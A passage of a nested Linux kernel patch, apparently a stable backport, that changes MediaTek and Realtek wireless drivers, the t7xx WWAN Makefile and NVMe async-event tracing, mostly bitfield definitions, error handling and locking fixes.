+-#define MT_CRXV_HE_LDPC_EXT_SYM		BIT(20)
+-#define MT_CRXV_HE_PE_DISAMBIG		BIT(23)
+-#define MT_CRXV_HE_NUM_USER		GENMASK(30, 24)
+-#define MT_CRXV_HE_UPLINK		BIT(31)
+-#define MT_CRXV_HE_RU0			GENMASK(7, 0)
+-#define MT_CRXV_HE_RU1			GENMASK(15, 8)
+-#define MT_CRXV_HE_RU2			GENMASK(23, 16)
+-#define MT_CRXV_HE_RU3			GENMASK(31, 24)
+-
+-#define MT_CRXV_HE_MU_AID		GENMASK(30, 20)
++#define MT_CRXV_HE_NUM_USER		GENMASK(26, 20)
++#define MT_CRXV_HE_LTF_SIZE		GENMASK(28, 27)
++#define MT_CRXV_HE_LDPC_EXT_SYM		BIT(30)
++
++#define MT_CRXV_HE_PE_DISAMBIG		BIT(1)
++#define MT_CRXV_HE_UPLINK		BIT(2)
++
++#define MT_CRXV_HE_MU_AID		GENMASK(27, 17)
++#define MT_CRXV_HE_BEAM_CHNG		BIT(29)
++
++#define MT_CRXV_HE_DOPPLER		BIT(0)
++#define MT_CRXV_HE_BSS_COLOR		GENMASK(15, 10)
++#define MT_CRXV_HE_TXOP_DUR		GENMASK(19, 17)
+ 
+ #define MT_CRXV_HE_SR_MASK		GENMASK(11, 8)
+ #define MT_CRXV_HE_SR1_MASK		GENMASK(16, 12)
+ #define MT_CRXV_HE_SR2_MASK             GENMASK(20, 17)
+ #define MT_CRXV_HE_SR3_MASK             GENMASK(24, 21)
+ 
+-#define MT_CRXV_HE_BSS_COLOR		GENMASK(5, 0)
+-#define MT_CRXV_HE_TXOP_DUR		GENMASK(12, 6)
+-#define MT_CRXV_HE_BEAM_CHNG		BIT(13)
+-#define MT_CRXV_HE_DOPPLER		BIT(16)
++#define MT_CRXV_HE_RU0			GENMASK(8, 0)
++#define MT_CRXV_HE_RU1			GENMASK(17, 9)
++#define MT_CRXV_HE_RU2			GENMASK(26, 18)
++#define MT_CRXV_HE_RU3_L		GENMASK(31, 27)
++#define MT_CRXV_HE_RU3_H		GENMASK(3, 0)
+ 
+ enum tx_header_format {
+ 	MT_HDR_FORMAT_802_3,
+@@ -268,17 +265,6 @@ enum tx_mgnt_type {
+ /* VHT/HE only use bits 0-3 */
+ #define MT_TX_RATE_IDX			GENMASK(5, 0)
+ 
+-struct mt7996_txp {
+-	__le16 flags;
+-	__le16 token;
+-	u8 bss_idx;
+-	__le16 rept_wds_wcid;
+-	u8 nbuf;
+-#define MT_TXP_MAX_BUF_NUM	6
+-	__le32 buf[MT_TXP_MAX_BUF_NUM];
+-	__le16 len[MT_TXP_MAX_BUF_NUM];
+-} __packed __aligned(4);
+-
+ #define MT_TXFREE0_PKT_TYPE		GENMASK(31, 27)
+ #define MT_TXFREE0_MSDU_CNT		GENMASK(25, 16)
+ #define MT_TXFREE0_RX_BYTE		GENMASK(15, 0)
+@@ -382,7 +368,7 @@ struct mt7996_dfs_radar_spec {
+ 	struct mt7996_dfs_pattern radar_pattern[16];
+ };
+ 
+-static inline struct mt7996_txp *
++static inline struct mt76_connac_txp_common *
+ mt7996_txwi_to_txp(struct mt76_dev *dev, struct mt76_txwi_cache *t)
+ {
+ 	u8 *txwi;
+@@ -392,7 +378,7 @@ mt7996_txwi_to_txp(struct mt76_dev *dev, struct mt76_txwi_cache *t)
+ 
+ 	txwi = mt76_get_txwi_ptr(dev, t);
+ 
+-	return (struct mt7996_txp *)(txwi + MT_TXD_SIZE);
++	return (struct mt76_connac_txp_common *)(txwi + MT_TXD_SIZE);
+ }
+ 
+ #endif
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+index d593ed9e3f73c..c8c332ed8a402 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+@@ -421,7 +421,8 @@ mt7996_mcu_ie_countdown(struct mt7996_dev *dev, struct sk_buff *skb)
+ 	if (hdr->band && dev->mt76.phys[hdr->band])
+ 		mphy = dev->mt76.phys[hdr->band];
+ 
+-	tail = skb->data + le16_to_cpu(rxd->len);
++	tail = skb->data + skb->len;
++	data += sizeof(struct header);
+ 	while (data + sizeof(struct tlv) < tail && le16_to_cpu(tlv->len)) {
+ 		switch (le16_to_cpu(tlv->tag)) {
+ 		case UNI_EVENT_IE_COUNTDOWN_CSA:
+@@ -1804,8 +1805,9 @@ mt7996_mcu_beacon_cont(struct mt7996_dev *dev, struct ieee80211_vif *vif,
+ 	}
+ 
+ 	buf = (u8 *)bcn + sizeof(*bcn) - MAX_BEACON_SIZE;
+-	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, 0, NULL,
++	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, NULL, 0, 0,
+ 			      BSS_CHANGED_BEACON);
++
+ 	memcpy(buf + MT_TXD_SIZE, skb->data, skb->len);
+ }
+ 
+@@ -1995,8 +1997,7 @@ int mt7996_mcu_beacon_inband_discov(struct mt7996_dev *dev,
+ 
+ 	buf = (u8 *)tlv + sizeof(*discov) - MAX_INBAND_FRAME_SIZE;
+ 
+-	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, 0, NULL,
+-			      changed);
++	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, NULL, 0, 0, changed);
+ 
+ 	memcpy(buf + MT_TXD_SIZE, skb->data, skb->len);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+index d8a2c1a744b25..2237f50adbc71 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+@@ -318,7 +318,7 @@ struct mt7996_dev *mt7996_mmio_probe(struct device *pdev,
+ {
+ 	static const struct mt76_driver_ops drv_ops = {
+ 		/* txwi_size = txd size + txp size */
+-		.txwi_size = MT_TXD_SIZE + sizeof(struct mt7996_txp),
++		.txwi_size = MT_TXD_SIZE + sizeof(struct mt76_connac_fw_txp),
+ 		.drv_flags = MT_DRV_TXWI_NO_FREE |
+ 			     MT_DRV_HW_MGMT_TXQ,
+ 		.survey_flags = SURVEY_INFO_TIME_TX |
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h b/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h
+index 725344791b4cd..e8eedae78479f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h
+@@ -472,8 +472,9 @@ void mt7996_mac_enable_nf(struct mt7996_dev *dev, u8 band);
+ void mt7996_mac_enable_rtscts(struct mt7996_dev *dev,
+ 			      struct ieee80211_vif *vif, bool enable);
+ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+-			   struct sk_buff *skb, struct mt76_wcid *wcid, int pid,
+-			   struct ieee80211_key_conf *key, u32 changed);
++			   struct sk_buff *skb, struct mt76_wcid *wcid,
++			   struct ieee80211_key_conf *key, int pid,
++			   enum mt76_txq_id qid, u32 changed);
+ void mt7996_mac_set_timing(struct mt7996_phy *phy);
+ int mt7996_mac_sta_add(struct mt76_dev *mdev, struct ieee80211_vif *vif,
+ 		       struct ieee80211_sta *sta);
+diff --git a/drivers/net/wireless/mediatek/mt76/tx.c b/drivers/net/wireless/mediatek/mt76/tx.c
+index 1f309d05380ad..b435aed6aff7d 100644
+--- a/drivers/net/wireless/mediatek/mt76/tx.c
++++ b/drivers/net/wireless/mediatek/mt76/tx.c
+@@ -77,7 +77,9 @@ mt76_tx_status_unlock(struct mt76_dev *dev, struct sk_buff_head *list)
+ 		}
+ 
+ 		hw = mt76_tx_status_get_hw(dev, skb);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 	}
+ 	rcu_read_unlock();
+ }
+@@ -263,7 +265,9 @@ void __mt76_tx_complete_skb(struct mt76_dev *dev, u16 wcid_idx, struct sk_buff *
+ 	if (cb->pktid < MT_PACKET_ID_FIRST) {
+ 		hw = mt76_tx_status_get_hw(dev, skb);
+ 		status.sta = wcid_to_sta(wcid);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/util.c b/drivers/net/wireless/mediatek/mt76/util.c
+index 581964425468f..fc76c66ff1a5a 100644
+--- a/drivers/net/wireless/mediatek/mt76/util.c
++++ b/drivers/net/wireless/mediatek/mt76/util.c
+@@ -24,23 +24,23 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ }
+ EXPORT_SYMBOL_GPL(__mt76_poll);
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int tick)
+ {
+ 	u32 cur;
+ 
+-	timeout /= 10;
++	timeout /= tick;
+ 	do {
+ 		cur = __mt76_rr(dev, offset) & mask;
+ 		if (cur == val)
+ 			return true;
+ 
+-		usleep_range(10000, 20000);
++		usleep_range(1000 * tick, 2000 * tick);
+ 	} while (timeout-- > 0);
+ 
+ 	return false;
+ }
+-EXPORT_SYMBOL_GPL(__mt76_poll_msec);
++EXPORT_SYMBOL_GPL(____mt76_poll_msec);
+ 
+ int mt76_wcid_alloc(u32 *mask, int size)
+ {
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+index 3a035afcf7f99..9a9cfd0ce402d 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+@@ -1091,6 +1091,7 @@ static void rt2x00lib_remove_hw(struct rt2x00_dev *rt2x00dev)
+ 	}
+ 
+ 	kfree(rt2x00dev->spec.channels_info);
++	kfree(rt2x00dev->chan_survey);
+ }
+ 
+ static const struct ieee80211_tpt_blink rt2x00_tpt_blink[] = {
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index 9d0ed6760cb61..a0c61a39a969d 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1801,6 +1801,7 @@ struct rtl8xxxu_fileops rtl8192eu_fops = {
+ 	.rx_desc_size = sizeof(struct rtl8xxxu_rxdesc24),
+ 	.has_s0s1 = 0,
+ 	.gen2_thermal_meter = 1,
++	.needs_full_init = 1,
+ 	.adda_1t_init = 0x0fc01616,
+ 	.adda_1t_path_on = 0x0fc01616,
+ 	.adda_2t_path_on_a = 0x0fc01616,
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index d22990464dad6..846bd268ffd94 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -1574,11 +1574,7 @@ rtl8xxxu_set_spec_sifs(struct rtl8xxxu_priv *priv, u16 cck, u16 ofdm)
+ static void rtl8xxxu_print_chipinfo(struct rtl8xxxu_priv *priv)
+ {
+ 	struct device *dev = &priv->udev->dev;
+-	char cut = '?';
+-
+-	/* Currently always true: chip_cut is 4 bits. */
+-	if (priv->chip_cut <= 15)
+-		cut = 'A' + priv->chip_cut;
++	char cut = 'A' + priv->chip_cut;
+ 
+ 	dev_info(dev,
+ 		 "RTL%s rev %c (%s) %iT%iR, TX queues %i, WiFi=%i, BT=%i, GPS=%i, HI PA=%i\n",
+diff --git a/drivers/net/wireless/realtek/rtlwifi/debug.c b/drivers/net/wireless/realtek/rtlwifi/debug.c
+index 0b1bc04cb6adb..9eb26dfe4ca92 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/debug.c
++++ b/drivers/net/wireless/realtek/rtlwifi/debug.c
+@@ -278,8 +278,8 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -287,7 +287,7 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 	num = sscanf(tmp, "%x %x %x", &addr, &val, &len);
+ 
+ 	if (num !=  3)
+-		return count;
++		return -EINVAL;
+ 
+ 	switch (len) {
+ 	case 1:
+@@ -375,8 +375,8 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -386,7 +386,7 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 	if (num != 4) {
+ 		rtl_dbg(rtlpriv, COMP_ERR, DBG_DMESG,
+ 			"Format is <path> <addr> <mask> <data>\n");
+-		return count;
++		return -EINVAL;
+ 	}
+ 
+ 	rtl_set_rfreg(hw, path, addr, bitmask, data);
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index aa7c5901ef260..8625a0a1430ac 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -233,7 +233,7 @@ static int rtw_pwr_seq_parser(struct rtw_dev *rtwdev,
+ 
+ 		ret = rtw_sub_pwr_seq_parser(rtwdev, intf_mask, cut_mask, cmd);
+ 		if (ret)
+-			return -EBUSY;
++			return ret;
+ 
+ 		idx++;
+ 	} while (1);
+@@ -247,6 +247,7 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	const struct rtw_pwr_seq_cmd **pwr_seq;
+ 	u8 rpwm;
+ 	bool cur_pwr;
++	int ret;
+ 
+ 	if (rtw_chip_wcpu_11ac(rtwdev)) {
+ 		rpwm = rtw_read8(rtwdev, rtwdev->hci.rpwm_addr);
+@@ -270,8 +271,9 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 		return -EALREADY;
+ 
+ 	pwr_seq = pwr_on ? chip->pwr_on_seq : chip->pwr_off_seq;
+-	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+-		return -EINVAL;
++	ret = rtw_pwr_seq_parser(rtwdev, pwr_seq);
++	if (ret)
++		return ret;
+ 
+ 	if (pwr_on)
+ 		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
+diff --git a/drivers/net/wireless/realtek/rtw88/rtw8821c.c b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+index 17f800f6efbd0..67efa58dd78ee 100644
+--- a/drivers/net/wireless/realtek/rtw88/rtw8821c.c
++++ b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+@@ -47,7 +47,7 @@ static int rtw8821c_read_efuse(struct rtw_dev *rtwdev, u8 *log_map)
+ 
+ 	map = (struct rtw8821c_efuse *)log_map;
+ 
+-	efuse->rfe_option = map->rfe_option;
++	efuse->rfe_option = map->rfe_option & 0x1f;
+ 	efuse->rf_board_option = map->rf_board_option;
+ 	efuse->crystal_cap = map->xtal_k;
+ 	efuse->pa_type_2g = map->pa_type;
+@@ -1537,7 +1537,6 @@ static const struct rtw_rfe_def rtw8821c_rfe_defs[] = {
+ 	[2] = RTW_DEF_RFE_EXT(8821c, 0, 0, 2),
+ 	[4] = RTW_DEF_RFE_EXT(8821c, 0, 0, 2),
+ 	[6] = RTW_DEF_RFE(8821c, 0, 0),
+-	[34] = RTW_DEF_RFE(8821c, 0, 0),
+ };
+ 
+ static struct rtw_hw_reg rtw8821c_dig[] = {
+diff --git a/drivers/net/wireless/realtek/rtw88/usb.c b/drivers/net/wireless/realtek/rtw88/usb.c
+index 2a8336b1847a5..a10d6fef4ffaf 100644
+--- a/drivers/net/wireless/realtek/rtw88/usb.c
++++ b/drivers/net/wireless/realtek/rtw88/usb.c
+@@ -118,6 +118,22 @@ static void rtw_usb_write32(struct rtw_dev *rtwdev, u32 addr, u32 val)
+ 	rtw_usb_write(rtwdev, addr, val, 4);
+ }
+ 
++static int dma_mapping_to_ep(enum rtw_dma_mapping dma_mapping)
++{
++	switch (dma_mapping) {
++	case RTW_DMA_MAPPING_HIGH:
++		return 0;
++	case RTW_DMA_MAPPING_NORMAL:
++		return 1;
++	case RTW_DMA_MAPPING_LOW:
++		return 2;
++	case RTW_DMA_MAPPING_EXTRA:
++		return 3;
++	default:
++		return -EINVAL;
++	}
++}
++
+ static int rtw_usb_parse(struct rtw_dev *rtwdev,
+ 			 struct usb_interface *interface)
+ {
+@@ -129,6 +145,8 @@ static int rtw_usb_parse(struct rtw_dev *rtwdev,
+ 	int num_out_pipes = 0;
+ 	int i;
+ 	u8 num;
++	const struct rtw_chip_info *chip = rtwdev->chip;
++	const struct rtw_rqpn *rqpn;
+ 
+ 	for (i = 0; i < interface_desc->bNumEndpoints; i++) {
+ 		endpoint = &host_interface->endpoint[i].desc;
+@@ -183,31 +201,34 @@ static int rtw_usb_parse(struct rtw_dev *rtwdev,
+ 
+ 	rtwdev->hci.bulkout_num = num_out_pipes;
+ 
+-	switch (num_out_pipes) {
+-	case 4:
+-	case 3:
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID0] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID1] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID2] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID3] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID4] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID5] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID6] = 0;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID7] = 0;
+-		break;
+-	case 2:
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID0] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID1] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID2] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID3] = 1;
+-		break;
+-	case 1:
+-		break;
+-	default:
+-		rtw_err(rtwdev, "failed to get out_pipes(%d)\n", num_out_pipes);
++	if (num_out_pipes < 1 || num_out_pipes > 4) {
++		rtw_err(rtwdev, "invalid number of endpoints %d\n", num_out_pipes);
+ 		return -EINVAL;
+ 	}
+ 
++	rqpn = &chip->rqpn_table[num_out_pipes];
++
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID0] = dma_mapping_to_ep(rqpn->dma_map_be);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID1] = dma_mapping_to_ep(rqpn->dma_map_bk);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID2] = dma_mapping_to_ep(rqpn->dma_map_bk);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID3] = dma_mapping_to_ep(rqpn->dma_map_be);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID4] = dma_mapping_to_ep(rqpn->dma_map_vi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID5] = dma_mapping_to_ep(rqpn->dma_map_vi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID6] = dma_mapping_to_ep(rqpn->dma_map_vo);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID7] = dma_mapping_to_ep(rqpn->dma_map_vo);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID8] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID9] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID10] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID11] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID12] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID13] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID14] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID15] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_BEACON] = dma_mapping_to_ep(rqpn->dma_map_hi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_HIGH] = dma_mapping_to_ep(rqpn->dma_map_hi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_MGMT] = dma_mapping_to_ep(rqpn->dma_map_mg);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_H2C] = dma_mapping_to_ep(rqpn->dma_map_hi);
++
+ 	return 0;
+ }
+ 
+@@ -250,7 +271,7 @@ static void rtw_usb_write_port_tx_complete(struct urb *urb)
+ static int qsel_to_ep(struct rtw_usb *rtwusb, unsigned int qsel)
+ {
+ 	if (qsel >= ARRAY_SIZE(rtwusb->qsel_to_ep))
+-		return 0;
++		return -EINVAL;
+ 
+ 	return rtwusb->qsel_to_ep[qsel];
+ }
+@@ -265,6 +286,9 @@ static int rtw_usb_write_port(struct rtw_dev *rtwdev, u8 qsel, struct sk_buff *s
+ 	int ret;
+ 	int ep = qsel_to_ep(rtwusb, qsel);
+ 
++	if (ep < 0)
++		return ep;
++
+ 	pipe = usb_sndbulkpipe(usbd, rtwusb->out_ep[ep]);
+ 	urb = usb_alloc_urb(0, GFP_ATOMIC);
+ 	if (!urb)
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index e99eccf11c762..08c6d1a8c712d 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3374,18 +3374,22 @@ static int rtw89_core_register_hw(struct rtw89_dev *rtwdev)
+ 	ret = ieee80211_register_hw(hw);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to register hw\n");
+-		goto err;
++		goto err_free_supported_band;
+ 	}
+ 
+ 	ret = rtw89_regd_init(rtwdev, rtw89_regd_notifier);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to init regd\n");
+-		goto err;
++		goto err_unregister_hw;
+ 	}
+ 
+ 	return 0;
+ 
+-err:
++err_unregister_hw:
++	ieee80211_unregister_hw(hw);
++err_free_supported_band:
++	rtw89_core_clr_supported_band(rtwdev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 0ea734c81b4f0..e3129ba1ea200 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -3874,25 +3874,26 @@ int rtw89_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	rtw89_pci_link_cfg(rtwdev);
+ 	rtw89_pci_l1ss_cfg(rtwdev);
+ 
+-	ret = rtw89_core_register(rtwdev);
+-	if (ret) {
+-		rtw89_err(rtwdev, "failed to register core\n");
+-		goto err_clear_resource;
+-	}
+-
+ 	rtw89_core_napi_init(rtwdev);
+ 
+ 	ret = rtw89_pci_request_irq(rtwdev, pdev);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to request pci irq\n");
+-		goto err_unregister;
++		goto err_deinit_napi;
++	}
++
++	ret = rtw89_core_register(rtwdev);
++	if (ret) {
++		rtw89_err(rtwdev, "failed to register core\n");
++		goto err_free_irq;
+ 	}
+ 
+ 	return 0;
+ 
+-err_unregister:
++err_free_irq:
++	rtw89_pci_free_irq(rtwdev, pdev);
++err_deinit_napi:
+ 	rtw89_core_napi_deinit(rtwdev);
+-	rtw89_core_unregister(rtwdev);
+ err_clear_resource:
+ 	rtw89_pci_clear_resource(rtwdev, pdev);
+ err_declaim_pci:
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852b.c b/drivers/net/wireless/realtek/rtw89/rtw8852b.c
+index b635ac1d1ca2f..81b348631519d 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852b.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852b.c
+@@ -1284,7 +1284,7 @@ static void rtw8852b_ctrl_cck_en(struct rtw89_dev *rtwdev, bool cck_en)
+ static void rtw8852b_5m_mask(struct rtw89_dev *rtwdev, const struct rtw89_chan *chan,
+ 			     enum rtw89_phy_idx phy_idx)
+ {
+-	u8 pri_ch = chan->primary_channel;
++	u8 pri_ch = chan->pri_ch_idx;
+ 	bool mask_5m_low;
+ 	bool mask_5m_en;
+ 
+@@ -1292,12 +1292,13 @@ static void rtw8852b_5m_mask(struct rtw89_dev *rtwdev, const struct rtw89_chan *
+ 	case RTW89_CHANNEL_WIDTH_40:
+ 		/* Prich=1: Mask 5M High, Prich=2: Mask 5M Low */
+ 		mask_5m_en = true;
+-		mask_5m_low = pri_ch == 2;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWER;
+ 		break;
+ 	case RTW89_CHANNEL_WIDTH_80:
+ 		/* Prich=3: Mask 5M High, Prich=4: Mask 5M Low, Else: Disable */
+-		mask_5m_en = pri_ch == 3 || pri_ch == 4;
+-		mask_5m_low = pri_ch == 4;
++		mask_5m_en = pri_ch == RTW89_SC_20_UPMOST ||
++			     pri_ch == RTW89_SC_20_LOWEST;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWEST;
+ 		break;
+ 	default:
+ 		mask_5m_en = false;
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c.c b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+index a87482cc25f58..4f57d76ba26f7 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+@@ -1445,18 +1445,19 @@ static void rtw8852c_5m_mask(struct rtw89_dev *rtwdev,
+ 			     const struct rtw89_chan *chan,
+ 			     enum rtw89_phy_idx phy_idx)
+ {
+-	u8 pri_ch = chan->primary_channel;
++	u8 pri_ch = chan->pri_ch_idx;
+ 	bool mask_5m_low;
+ 	bool mask_5m_en;
+ 
+ 	switch (chan->band_width) {
+ 	case RTW89_CHANNEL_WIDTH_40:
+ 		mask_5m_en = true;
+-		mask_5m_low = pri_ch == 2;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWER;
+ 		break;
+ 	case RTW89_CHANNEL_WIDTH_80:
+-		mask_5m_en = ((pri_ch == 3) || (pri_ch == 4));
+-		mask_5m_low = pri_ch == 4;
++		mask_5m_en = pri_ch == RTW89_SC_20_UPMOST ||
++			     pri_ch == RTW89_SC_20_LOWEST;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWEST;
+ 		break;
+ 	default:
+ 		mask_5m_en = false;
+diff --git a/drivers/net/wwan/t7xx/Makefile b/drivers/net/wwan/t7xx/Makefile
+index 268ff9e87e5b3..2652cd00504e6 100644
+--- a/drivers/net/wwan/t7xx/Makefile
++++ b/drivers/net/wwan/t7xx/Makefile
+@@ -1,7 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ 
+-ccflags-y += -Werror
+-
+ obj-${CONFIG_MTK_T7XX} := mtk_t7xx.o
+ mtk_t7xx-y:=	t7xx_pci.o \
+ 		t7xx_pcie_mac.o \
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index c0429f9f50920..d567762545b05 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4808,8 +4808,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 	u32 aer_notice_type = nvme_aer_subtype(result);
+ 	bool requeue = true;
+ 
+-	trace_nvme_async_event(ctrl, aer_notice_type);
+-
+ 	switch (aer_notice_type) {
+ 	case NVME_AER_NOTICE_NS_CHANGED:
+ 		set_bit(NVME_AER_NOTICE_NS_CHANGED, &ctrl->events);
+@@ -4845,7 +4843,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 
+ static void nvme_handle_aer_persistent_error(struct nvme_ctrl *ctrl)
+ {
+-	trace_nvme_async_event(ctrl, NVME_AER_ERROR);
+ 	dev_warn(ctrl->device, "resetting controller due to AER\n");
+ 	nvme_reset_ctrl(ctrl);
+ }
+@@ -4861,6 +4858,7 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	if (le16_to_cpu(status) >> 1 != NVME_SC_SUCCESS)
+ 		return;
+ 
++	trace_nvme_async_event(ctrl, result);
+ 	switch (aer_type) {
+ 	case NVME_AER_NOTICE:
+ 		requeue = nvme_handle_aen_notice(ctrl, result);
+@@ -4878,7 +4876,6 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	case NVME_AER_SMART:
+ 	case NVME_AER_CSS:
+ 	case NVME_AER_VS:
